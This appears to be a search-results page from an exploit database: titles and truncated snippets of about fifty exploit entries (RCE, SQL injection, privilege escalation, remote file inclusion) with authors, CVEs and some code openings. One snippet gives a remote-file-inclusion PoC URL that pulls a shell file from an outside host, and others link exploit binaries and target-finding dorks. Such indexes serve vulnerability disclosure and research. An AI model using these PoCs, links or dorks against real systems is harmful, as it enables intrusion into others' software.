41207 matches found
LiteCart 2.1.2 - Arbitrary File Upload
LiteCart 2.1.2 - Arbitrary File Upload Exploit Title: LiteCart 2.1.2 - Arbitrary File Upload Date: 2018-08-27 Exploit Author: Haboob Team Software Link: https://www.litecart.net/downloading?version=2.1.2 Version: 2.1.2 CVE : CVE-2018-12256 1. Description admin/vqmods.app/vqmods.inc.php in LiteCar...
rConfig 3.9.4 - search.crud.php Remote Command Injection
rConfig 3.9.4 - search.crud.php Remote Command Injection Exploit Title: rConfig 3.9.4 - 'search.crud.php' Remote Command Injection Date: 2020-03-21 Exploit Author: Matthew Aberegg, Michael Burkey Vendor Homepage: https://www.rconfig.com Software Link:...
Microsoft VSCode Python Extension - Code Execution
Microsoft VSCode Python Extension - Code Execution VSCode Python Extension Code Execution This repository contains the Proof-of-Concept of a code execution vulnerability discovered in the Visual Studio Code Python extension. TL;DR: VScode may use code from a virtualenv found in the project folder...
Tomcat proprietaryEvaluate 9.0.0.M1 - Sandbox Escape
Tomcat proprietaryEvaluate 9.0.0.M1 - Sandbox Escape Exploit Title: Tomcat proprietaryEvaluate 9.0.0.M1 - Sandbox Escape Date: 2020-01-07 Exploit Author: Harrison Neal, PatchAdvisor Vendor Homepage: https://tomcat.apache.org/ Software Link:...
AsusWRT Router 3.0.0.4.380.7743 - LAN Remote Code Execution
AsusWRT Router 3.0.0.4.380.7743 - LAN Remote Code Execution Unauthenticated LAN remote code execution in AsusWRT Discovered by Pedro Ribeiro [email protected], Agile Information Security ================================================================================= Disclosure: 22/01/2018 / Last...
ClipShare Pro 2006-2007 - chid SQL Injection
ClipShare Pro 2006-2007 - chid SQL Injection ================================================================================================================== SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM S N N N A A K K E S T E A A M M M M SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE...
Veyon 4.3.4 - VeyonService Unquoted Service Path
Veyon 4.3.4 - VeyonService Unquoted Service Path Exploit Title: Veyon 4.3.4 - 'VeyonService' Unquoted Service Path Discovery by: Víctor García Discovery Date: 2020-03-23 Vendor Homepage: https://veyon.io/ Software Link:...
Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)
Microtik SSH Daemon 6.44.3 - Denial of Service PoC Excploit Title: Microtik SSH Daemon 6.44.3 - Denial of Service PoC Author: Hosein Askari Date: 2020-03-18 Vendor Homepage: https://mikrotik.com/ Model: hAP lite Processor architecture: smips Affected Version: through 6.44.3 CVE: N/A Description: ...
Microsoft Windows - AppX Deployment Service Local Privilege Escalation (3)
Microsoft Windows - AppX Deployment Service Local Privilege Escalation 3 CVE-2019-0841 BYPASS 2 There is a second bypass for CVE-2019-0841. This can be triggered as following: Delete all files and subfolders within "c:\users%username%\appdata\local\packages\Microsoft.MicrosoftEdge8wekyb3d8bbwe"...
Joomla! Component com_newsfeeds 1.0 - feedid SQL Injection
Joomla! Component comnewsfeeds 1.0 - feedid SQL Injection Exploit Title: Joomla! Component comnewsfeeds 1.0 - 'feedid' SQL Injection Date: 2020-03-10 Author: Milad Karimi Software Link: Version: Category : webapps Tested on: windows 10 , firefox CVE : CWE-89 Dork:...
rConfig 3.9 - searchColumn SQL Injection
rConfig 3.9 - searchColumn SQL Injection Exploit Title: rConfig 3.9 - 'searchColumn' SQL Injection Exploit Author: vikingfr Date: 2020-03-03 CVE-2020-10220 Exploit link : https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfigCVE-2020-10220.py Vendor Homepage: https://rconfig.com/ see al...
Microsoft Windows 10 Build 1803 1903 - COMahawk Local Privilege Escalation
Microsoft Windows 10 Build 1803 1903 - COMahawk Local Privilege Escalation EDB Note Download: - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47684-1.exe - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47684-2.zip COMahawk...
xorg-x11-server 1.20.3 (Solaris 11) - inittab Local Privilege Escalation
xorg-x11-server 1.20.3 Solaris 11 - inittab Local Privilege Escalation !/bin/sh Exploit Title: xorg-x11-server A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission check for -modulepath and -logfile options when starting Xorg. X server allows unprivileged users with the...
μTorrent (uTorrent) ClassicWeb - JSON-RPC Remote Code Execution Information Disclosure
μTorrent uTorrent ClassicWeb - JSON-RPC Remote Code Execution Information Disclosure By default, utorrent create an HTTP RPC server on port 10000 uTorrent classic or 19575 uTorrent web. There are numerous problems with these RPC servers that can be exploited by any website using XMLHTTPRequest. T...
PHPKB Multi-Language 9 - Authenticated Remote Code Execution
PHPKB Multi-Language 9 - Authenticated Remote Code Execution Exploit Title: PHPKB Multi-Language 9 - Authenticated Remote Code Execution Google Dork: N/A Date: 2020-03-15 Exploit Author: Antonio Cannito Vendor Homepage: https://www.knowledgebase-script.com/ Software Link:...
Binary File Descriptor Library (libbfd) - Out-of-Bounds Crash
Binary File Descriptor Library libbfd - Out-of-Bounds Crash Many shell users, and certainly a lot of the people working in computer forensics or other fields of information security, have a habit of running /usr/bin/strings on binary files originating from the Internet. Their understanding is tha...
GNU Bash - Environment Variable Command Injection (Metasploit)
GNU Bash - Environment Variable Command Injection Metasploit require 'msf/core' class Metasploit3 'bashedCgi', 'Description' = %q Quick & dirty module to send the BASH exploit payload CVE-2014-6271 to CGI scripts that are BASH-based or invoke BASH, to execute an arbitrary shell command. , 'Author...
Ricoh Printer Drivers - Local Privilege Escalation
Ricoh Printer Drivers - Local Privilege Escalation / This proof of concept code monitors file changes on Ricoh's driver DLL files and overwrites a DLL file before the library is loaded CVE-2019-19363. Written by Pentagrid AG, 2019. Cf...
OpenSSH 7.4 - UsePrivilegeSeparation Disabled Forwarded Unix Domain Sockets Privilege Escalation
OpenSSH 7.4 - UsePrivilegeSeparation Disabled Forwarded Unix Domain Sockets Privilege Escalation Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1010 This issue affects OpenSSH if privilege separation is disabled config option UsePrivilegeSeparation=no. While privilege separatio...
ASX to MP3 Converter 1.82.50 (Windows 2003 x86) - .asx Local Stack Overflow
ASX to MP3 Converter 1.82.50 Windows 2003 x86 - .asx Local Stack Overflow / ASX to MP3 Converter SOF - Ivan Ivanovic Ivanov Иван-дурак недействительный 31337 Team holahola https://www.exploit-db.com/exploits/38382/ Winblows 2k3 / include include include int main int i; char overwriteoffset =...
OpenSSL TLS Heartbeat Extension - Heartbleed Memory Disclosure
OpenSSL TLS Heartbeat Extension - Heartbleed Memory Disclosure !/usr/bin/python Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford [email protected] The author disclaims copyright to this source code. import sys import struct import socket import time import select import re...
Coppermine Photo Gallery 1.2.2b (Nuke Addon) - Remote File Inclusion
Coppermine Photo Gallery 1.2.2b Nuke Addon - Remote File Inclusion ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Coppermine Photo Gallery v1.2.2b for...
Zentrack 2.22.32.4 - index.php Remote File Inclusion
Zentrack 2.22.32.4 - index.php Remote File Inclusion source: https://www.securityfocus.com/bid/7843/info A remote file include vulnerability has been reported for Zentrack. Due to insufficient sanitization of some user-supplied variables by the 'index.php' script, it is possible for a remote...
cPanel 5.0 - Guestbook.cgi Remote Command Execution (4)
cPanel 5.0 - Guestbook.cgi Remote Command Execution 4 source: https://www.securityfocus.com/bid/6882/info A remote command execution vulnerability has been discovered in the cPanel CGI Application. This issue occurs due to insufficient sanitization of externally supplied data to the 'guestbook.cg...
Wordpress Plugin Search Meter 2.13.2 - CSV injection
Wordpress Plugin Search Meter 2.13.2 - CSV injection Exploit Title: Wordpress Plugin Search Meter 2.13.2 - CSV Injection Google Dork: N/A Date: 2020-03-10 Exploit Author: Daniel Monzón stark0de Vendor Homepage: https://thunderguy.com/semicolon/ Software Link:...
Microsoft Windows 7 (x86) - BlueKeep Remote Desktop Protocol (RDP) Remote Windows Kernel Use After Free
Microsoft Windows 7 x86 - BlueKeep Remote Desktop Protocol RDP Remote Windows Kernel Use After Free EDB Note: Download https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47683.zip import rdp import socket import binascii import time def poolsprays, crypter, payload...
MikroTik RouterOS 6.45.6 - DNS Cache Poisoning
MikroTik RouterOS 6.45.6 - DNS Cache Poisoning Exploit Title: MikroTik RouterOS 6.45.6 - DNS Cache Poisoning Date: 2019-10-30 Exploit Author: Jacob Baines Vendor Homepage: https://mikrotik.com/ Software Link: https://mikrotik.com/download Version: 6.45.6 Stable and below or 6.44.5 Long-term and...
XiongMai uc-httpd 1.0.0 - Buffer Overflow
XiongMai uc-httpd 1.0.0 - Buffer Overflow Exploit Title: XiongMai uc-httpd 1.0.0 - Buffer Overflow Date: 2018-06-08 Exploit Author: Andrew Watson Software Version: XiongMai uc-httpd 1.0.0 Vendor Homepage: http://www.xiongmaitech.com/en/ Tested on: KKMoon DVR running XiongMai uc-httpd 1.0.0 on...
Tagger Luxury Edition - BBCodeFile Remote File Inclusion
Tagger Luxury Edition - BBCodeFile Remote File Inclusion Tagger v3 = BBCodeFile Remote file inclusion Discovered by : Morgan Error in : tags.php include$BBCodeFile; Vendor Website: http://www.venturenine.com PoC: http://victim-site.com/tags.php?BBCodeFile=http://ehmorgan.net/shell.dat? Google dor...
AnyBurn 4.8 - Buffer Overflow (SEH)
AnyBurn 4.8 - Buffer Overflow SEH Exploit Title: AnyBurn 4.8 - Buffer Overflow SEH Date: 2020-03-09 Vendor Homepage: http://www.anyburn.com/ Software Link : http://www.anyburn.com/anyburnsetup.exe Exploit Authors: "Richard Davy/Gary Nield" Tested Version: 4.8 32-bit Tested on: Windows 10 Enterpri...
Microsoft Visual Basic 2010 Express - XML External Entity Injection
Microsoft Visual Basic 2010 Express - XML External Entity Injection Exploit Title: Microsoft Visual Basic 2010 Express - XML External Entity Injection Exploit Author: ZwX Exploit Date: 2019-12-03 Version Software : 10.0.30319.1 RTMRel Vendor Homepage : https://www.microsoft.com/ Software Link:...
Cisco RV300 RV320 - Information Disclosure
Cisco RV300 RV320 - Information Disclosure Exploit Title: 6coRV Exploit Date: 01-26-2018 Exploit Author: Harom Ramos Horus Tested on: Cisco RV300/RV320 CVE : CVE-2019-1653 import requests from requests.packages.urllib3.exceptions import InsecureRequestWarning from fakeuseragent import UserAgent d...
HRSALE 1.1.8 - Cross-Site Request Forgery (Add Admin)
HRSALE 1.1.8 - Cross-Site Request Forgery Add Admin Exploit Title: HRSALE 1.1.8 - Cross-Site Request Forgery Add Admin Date: 2020-03-11 Exploit Author: Ismail Akıcı Vendor Homepage: http://hrsale.com/ Software Link : http://demo.hrsale.com/ Software : HRSALE v1.1.8 Product Version: v1.1.8...
Blueimps jQuery File Upload 9.22.0 - Arbitrary File Upload Exploit
Blueimps jQuery File Upload 9.22.0 - Arbitrary File Upload Exploit Exploit Title: Exploit for Blueimp's jQuery File Upload include include include include include include define BSIZE 1024 define DEBUG 1 define TESTONLY 0 void buildstring char p, char path, char arg, char ar1, int func; int main...
VirtualBox 5.2.6.r120293 - VM Escape
VirtualBox 5.2.6.r120293 - VM Escape Oracle fixed some of the issues I reported in VirtualBox during the Oracle Critical Patch Update - April 2018. CVE-2018-2844 was an interesting double fetch vulnerability in VirtualBox Video Acceleration VBVA feature affecting Linux hosts. VBVA feature works o...
dhclient 4.1 - Bash Environment Variable Command Injection (Shellshock)
dhclient 4.1 - Bash Environment Variable Command Injection Shellshock !/usr/bin/python Exploit Title: ShellShock dhclient Bash Environment Variable Command Injection PoC Date: 2014-09-29 Author: @fdiskyou e-mail: rui at deniable.org Version: 4.1 Tested on: Debian, Ubuntu, Kali CVE: CVE-2014-6277,...
Mambo Component SimpleBoard 1.1.0 - Remote File Inclusion
Mambo Component SimpleBoard 1.1.0 - Remote File Inclusion Bug Found by h4ntu http://h4ntu.com batamhacker crew Another Mambo component remote inclusion vulneribility download : http://mamboxchange.com/frs/download.php/6920/Simpleboard-1.1.0-Stable.zip bug found in file fileupload.php :...
Cisco RV320 Dual Gigabit WAN VPN Router 1.4.2.15 - Command Injection
Cisco RV320 Dual Gigabit WAN VPN Router 1.4.2.15 - Command Injection RedTeam Pentesting discovered a command injection vulnerability in the web-based certificate generator feature of the Cisco RV320 router. Details ======= Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others Affected...
Linux Kernel 4.15.x 4.19.2 - map_write() CAP_SYS_ADMIN Local Privilege Escalation (polkit Method)
Linux Kernel 4.15.x 4.19.2 - mapwrite CAPSYSADMIN Local Privilege Escalation polkit Method !/bin/sh EDB Note: Download https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47167.zip wrapper for Jann Horn's exploit for CVE-2018-18955 uses polkit technique ---...
Joomla! Component JComments 2.1 - ComntrNam Cross-Site Scripting
Joomla! Component JComments 2.1 - ComntrNam Cross-Site Scripting source: https://www.securityfocus.com/bid/40230/info The JComments component for Joomla! is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue...
ProficySCADA for iOS 5.0.25920 - Password Denial of Service (PoC)
ProficySCADA for iOS 5.0.25920 - Password Denial of Service PoC Exploit Title: ProficySCADA for iOS 5.0.25920 - 'Password' Denial of Service PoC Author: Ivan Marmolejo Date: 2020-03-22 Vendor Homepage: https://apps.apple.com/us/app/proficyscada/id525792142 Software Link: App Store for iOS devices...
QNAP Netatalk 3.1.12 - Authentication Bypass
QNAP Netatalk 3.1.12 - Authentication Bypass Exploit Title: QNAP Netatalk Authentication Bypass Date: 12/20/2018 Original Exploit Author: Jacob Baines Modifications for QNAP devices: Mati Aharoni Vendor Homepage: http://netatalk.sourceforge.net/ Software Link:...
Apache CouchDB 2.1.0 - Remote Code Execution
Apache CouchDB 2.1.0 - Remote Code Execution Title: Apache CouchDB 2.1.0 - Remote Code Execution Author: Cody Zacharias Shodan Dork: port:5984 Vendor Homepage: http://couchdb.apache.org/ Software Link: http://archive.apache.org/dist/couchdb/source/1.6.0/ Version: = 1.7.0 and 2.x - 2.1.0 Tested on...
radnics gold 5.0 - Multiple Vulnerabilities
radnics gold 5.0 - Multiple Vulnerabilities -----------------------------I AM MUSLIM !!------------------------------ ============================================================================== / \ | | | | / \ | | | | / \ | | | | / \ | || | / \ | | | | / \ | | IN THE NAME OF // \ || || // \ ||...
PHPKB Multi-Language 9 - Authenticated Directory Traversal
PHPKB Multi-Language 9 - Authenticated Directory Traversal Exploit Title: PHPKB Multi-Language 9 - Authenticated Directory Traversal Google Dork: N/A Date: 2020-03-15 Exploit Author: Antonio Cannito Vendor Homepage: https://www.knowledgebase-script.com/ Software Link:...
Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)
Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery Add Admin Exploit Title: Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery Add Admin Date: 2020-03-05 Exploit Author: Miguel Mendez Z. Vendor Homepage: www.sumavision.com Software Link:...
Pandora 7.0NG - Remote Code Execution
Pandora 7.0NG - Remote Code Execution Exploit Title: Pandora 7.0NG - Remote Code Execution Date: 2019-11-14 Exploit Author: Askar @mohammadaskar2 CVE: CVE-2019-20224 Vendor Homepage: https://pandorafms.org/ Software link: https://pandorafms.org/features/free-download-monitoring-software/ Version:...
ashNews 0.83 - pathtoashnews Remote File Inclusion
ashNews 0.83 - pathtoashnews Remote File Inclusion DEVIL TEAM THE BEST POLISH TEAM ashnews v0.83pathtoashnews - Remote File Include Vulnerabilities Script site: http://dev.ashwebstudio.com/ dork: News powered by ashnews Find by Kacper Rahim. Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam...
OpenSMTPD 6.4.0 6.6.1 - Local Privilege Escalation + Remote Code Execution
OpenSMTPD 6.4.0 6.6.1 - Local Privilege Escalation + Remote Code Execution Exploit Title: OpenSMTPD 6.6.1 - Local Privilege Escalation Date: 2020-02-02 Exploit Author: Marco Ivaldi Vendor Homepage: https://www.opensmtpd.org/ Version: OpenSMTPD 6.4.0 - 6.6.1 Tested on: OpenBSD 6.6, Debian GNU/Linu...
Modern POS 1.3 - SQL Injection
Modern POS 1.3 - SQL Injection Exploit Title: Modern POS 1.3 - SQL Injection Dork: N/A Date: 2019-01-13 Exploit Author: Ihsan Sencan Vendor Homepage: http://itsolution24.com/ Software Link: https://codecanyon.net/item/modern-pos-point-of-sale-with-stock-management-system/22702683 Version: 1.3...